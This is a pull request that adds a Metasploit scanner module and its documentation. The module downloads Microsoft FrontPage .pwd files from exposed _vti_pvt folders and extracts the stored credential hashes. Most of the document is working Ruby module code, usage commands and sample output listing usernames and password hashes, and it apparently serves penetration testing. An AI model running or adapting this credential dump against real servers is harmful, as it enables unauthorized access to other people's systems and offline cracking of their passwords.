### PR TITLE
Add FrontPage Credential Dump Module

### DIFF
--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.md
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.md
@@ -24,19 +24,20 @@ run
 msf auxiliary(scanner/http/frontpage_credential_dump) > run
 
 [+] 10.10.10.10 - service.pwd
-[+] # -FrontPage-
-[+] username:kLAsISPJ8AsaQ
-
 [+] 10.10.10.10 - administrators.pwd
-[+] # -FrontPage-
-[+] username:wMyvw3d3c1oWU
-
 [+] 10.10.10.10 - authors.pwd
-[+] # -FrontPage-
-[+] username:wMyvw3d3c1oWU
 
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
+FrontPage Credentials
+=====================
+
+ Source          Username    Password Hash
+ ------          --------    -------------
+ Administrators  e-scan.com  xMyvw4d3c1oWY
+ Authors         e-scan.com  xMyvw4d3c1oWY
+ Service         e-scan.com  jLAsITPJ8AsaR
+
+[*] Credentials saved in: /root/.msf4/loot/20180921124147_default_10.10.10.10_frontpage.creds_096592.txt
+
 ```
 
 ## Verbose Output
@@ -47,23 +48,23 @@ msf auxiliary(scanner/http/frontpage_credential_dump) > run
 [*] Found /about/_vti_pvt/service.pwd.
 [*] Found FrontPage credentials.
 [+] 10.10.10.10 - service.pwd
-[+] # -FrontPage-
-[+] username:kLAsISPJ8AsaQ
-
 [*] Requesting: /about/_vti_pvt/administrators.pwd
 [*] Found /about/_vti_pvt/administrators.pwd.
 [*] Found FrontPage credentials.
 [+] 10.10.10.10 - administrators.pwd
-[+] # -FrontPage-
-[+] username:wMyvw3d3c1oWU
-
 [*] Requesting: /about/_vti_pvt/authors.pwd
 [*] Found /about/_vti_pvt/authors.pwd.
 [*] Found FrontPage credentials.
 [+] 10.10.10.10 - authors.pwd
-[+] # -FrontPage-
-[+] username:wMyvw3d3c1oWU
 
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
+FrontPage Credentials
+=====================
+
+ Source          Username    Password Hash
+ ------          --------    -------------
+ Administrators  e-scan.com  xMyvw4d3c1oWY
+ Authors         e-scan.com  xMyvw4d3c1oWY
+ Service         e-scan.com  jLAsITPJ8AsaR
+
+[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt
 ```

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.md
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.md
@@ -1,0 +1,69 @@
+## Description
+When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server.
+
+Affected Files:
+
+ * administrators.pwd
+ * authors.pwd
+ * service.pwd
+
+Citations:
+ * https://msdn.microsoft.com/en-us/library/cc750050.aspx
+ * http://sparty.secniche.org/
+
+## Usage
+```
+use auxiliary/scanner/http/frontpage_credential_dump
+set RHOSTS 10.10.10.10
+set TARGETURI about
+run
+```
+
+## Standard Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[+] 10.10.10.10 - service.pwd
+[+] # -FrontPage-
+[+] username:kLAsISPJ8AsaQ
+
+[+] 10.10.10.10 - administrators.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[+] 10.10.10.10 - authors.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Verbose Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[*] Requesting: /about/_vti_pvt/service.pwd
+[*] Found /about/_vti_pvt/service.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - service.pwd
+[+] # -FrontPage-
+[+] username:kLAsISPJ8AsaQ
+
+[*] Requesting: /about/_vti_pvt/administrators.pwd
+[*] Found /about/_vti_pvt/administrators.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - administrators.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Requesting: /about/_vti_pvt/authors.pwd
+[*] Found /about/_vti_pvt/authors.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - authors.pwd
+[+] # -FrontPage-
+[+] username:wMyvw3d3c1oWU
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    cred_table = Rex::Text::Table.new(                                      
+    cred_table = Rex::Text::Table.new(
       'Header'  => 'FrontPage Credentials',
       'Indent'  => 1,
       'Columns' => ['Source', 'Username', 'Password Hash']

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -12,13 +12,13 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'FrontPage .pwd File Credential Dump',
       'Description'    => %q{
-        This module downloads and parses the '_vti_pvt/service.pwd', 
+        This module downloads and parses the '_vti_pvt/service.pwd',
         '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage
          server to find credentials.
       },
       'References'     =>
         [
-          [ 'URL', 'https://packetstormsecurity.com/files/11556/cgi-check99v4.r.html'],
+          [ 'PACKETSTORM', '11556'],
           [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],
           [ 'URL', 'http://sparty.secniche.org/' ]
         ],

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'FrontPage .pwd File Credential Dump',
+      'Description'    => %q{
+          This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files
+       on a FrontPage server to find credentials.
+      },
+      'References'     =>
+        [
+          [ 'URL', 'http://sparty.secniche.org/' ]
+        ],
+      'Author'         =>
+        [
+          '_devalias - Sparty tool',
+          'averagesecurityguy - Metasploit module'
+        ],
+      'License'        => MSF_LICENSE,
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path', '/'])
+    ])
+  end
+
+
+  def get_pass_file(fname)
+    uri = normalize_uri(target_uri.path, '_vti_pvt', fname)
+
+    vprint_status("Requesting: #{uri}")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+    })
+
+    if res.code == 200
+      vprint_status("Found #{uri}.")
+      if res.body.lines.first.chomp == "# -FrontPage-"
+        vprint_status("Found FrontPage credentials.")
+        return res.body
+      else
+        vprint_status("Filed does not contain FrontPage credentials.")
+        vprint_status(res.body)
+        return nil
+      end
+    else
+      vprint_status("File #{uri} not found.")
+      return nil
+    end
+  end
+
+  def run_host(ip)
+    files = ['service.pwd', 'administrators.pwd', 'authors.pwd']
+
+    files.each do |filename|
+      contents = get_pass_file(filename)
+      if contents != nil
+        print_good("#{ip} - #{filename}")
+
+        contents.each_line do |line|
+          print_good(line.chomp)
+        end
+
+        print_line("")
+
+        store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -12,11 +12,14 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'FrontPage .pwd File Credential Dump',
       'Description'    => %q{
-          This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files
-       on a FrontPage server to find credentials.
+        This module downloads and parses the '_vti_pvt/service.pwd', 
+        '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage
+         server to find credentials.
       },
       'References'     =>
         [
+          [ 'URL', 'https://packetstormsecurity.com/files/11556/cgi-check99v4.r.html'],
+          [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],
           [ 'URL', 'http://sparty.secniche.org/' ]
         ],
       'Author'         =>
@@ -65,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
     files.each do |filename|
       contents = get_pass_file(filename)
 
-      next if contents == nil
+      next if contents.nil?
 
       print_good("#{ip} - #{filename}")
 
@@ -73,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
         print_good(line.chomp)
       end
 
-      print_line()
+      print_line
 
       store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
     end

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'Author'         =>
         [
-          'Aditya K Sood @adityaksood', # Sparty tool',
+          'Aditya K Sood @adityaksood', # Sparty tool'
           'Stephen Haywood @averagesecguy' # Metasploit module'
         ],
       'License'        => MSF_LICENSE,
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
 
     vprint_status("Found #{uri}.")
 
-    unless res.body.lines.first.chomp == '# -FrontPage-"
+    unless res.body.lines.first.chomp == '# -FrontPage-'
       vprint_status("File does not contain FrontPage credentials.")
       vprint_status(res.body)
       return nil

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'Author'         =>
         [
-          'Aditya K Sood @adityaksood - Sparty tool',
-          'averagesecurityguy - Metasploit module'
+          'Aditya K Sood @adityaksood', # Sparty tool',
+          'Stephen Haywood @averagesecguy' # Metasploit module'
         ],
       'License'        => MSF_LICENSE,
     ))
@@ -42,20 +42,21 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET',
     })
 
-    if res.code == 200
-      vprint_status("Found #{uri}.")
-      if res.body.lines.first.chomp == "# -FrontPage-"
-        vprint_status("Found FrontPage credentials.")
-        return res.body
-      else
-        vprint_status("Filed does not contain FrontPage credentials.")
-        vprint_status(res.body)
-        return nil
-      end
-    else
+    unless res.code == 200
       vprint_status("File #{uri} not found.")
       return nil
     end
+
+    vprint_status("Found #{uri}.")
+
+    unless res.body.lines.first.chomp == '# -FrontPage-"
+      vprint_status("File does not contain FrontPage credentials.")
+      vprint_status(res.body)
+      return nil
+    end
+
+    vprint_status("Found FrontPage credentials.")
+    return res.body
   end
 
   def run_host(ip)
@@ -63,17 +64,18 @@ class MetasploitModule < Msf::Auxiliary
 
     files.each do |filename|
       contents = get_pass_file(filename)
-      if contents != nil
-        print_good("#{ip} - #{filename}")
 
-        contents.each_line do |line|
-          print_good(line.chomp)
-        end
+      next if contents == nil
 
-        print_line("")
+      print_good("#{ip} - #{filename}")
 
-        store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
+      contents.each_line do |line|
+        print_good(line.chomp)
       end
+
+      print_line()
+
+      store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename)
     end
   end
 end

--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'Author'         =>
         [
-          '_devalias - Sparty tool',
+          'Aditya K Sood @adityaksood - Sparty tool',
           'averagesecurityguy - Metasploit module'
         ],
       'License'        => MSF_LICENSE,


### PR DESCRIPTION
Downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage server to find credentials. Original idea taken from the Sparty tool by _devalias.

Citations:
* http://sparty.secniche.org/
* https://github.com/0xdevalias/sparty
* https://twitter.com/@AdityaKSood

## Usage
```
use auxiliary/scanner/http/frontpage_credential_dump
set RHOSTS 10.10.10.10
set TARGETURI about
run
```

## Standard Output
```
msf auxiliary(scanner/http/frontpage_credential_dump) > run

[+] <Redacted IP> - service.pwd
[+] # -FrontPage-
[+] username:kLAsITPJ8AsaQ

[+] <Redacted IP> - administrators.pwd
[+] # -FrontPage-
[+] username:wMyvw4d3c1oWU

[+] <Redacted IP> - authors.pwd
[+] # -FrontPage-
[+] username:wMyvw4d3c1oWU

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Verbose Output
```
msf auxiliary(scanner/http/frontpage_credential_dump) > run

[*] Requesting: /about/_vti_pvt/service.pwd
[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] <Redacted IP> - service.pwd
[+] # -FrontPage-
[+] username:kLAsITPJ8AsaQ

[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] <Redacted IP> - administrators.pwd
[+] # -FrontPage-
[+] username:wMyvw4d3c1oWU

[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] <Redacted IP> - authors.pwd
[+] # -FrontPage-
[+] username:wMyvw4d3c1oWU

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
